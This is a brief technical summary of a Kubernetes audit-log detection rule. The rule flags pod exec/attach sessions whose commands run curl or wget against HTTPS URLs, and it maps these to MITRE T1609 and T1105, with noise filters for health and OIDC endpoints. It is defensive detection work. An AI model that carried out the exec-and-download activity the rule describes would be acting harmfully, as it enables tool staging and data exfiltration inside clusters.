Technical summary: This rule monitors Kubernetes audit logs for exec/attach activity targeting a pod. It decodes the requestURI, extracts the command portion from URL parameters, and reconstructs a readable command. It flags cases where the executed command contains curl or wget and accesses an HTTPS URL. Noise filters exclude common cluster health endpoints and well-known OIDC/JWKS endpoints to reduce benign alerts. The alert exposes the decoded_uri and reconstructed Esql.executed_command for investigation. MITRE mappings cover T1609 (Container Administration Command) and T1105 (Ingress Tool Transfer). The goal is to detect unauthorized tooling download, staging, or data exfiltration initiated via an exec into a pod, while minimizing false positives from routine health checks or first-party endpoints.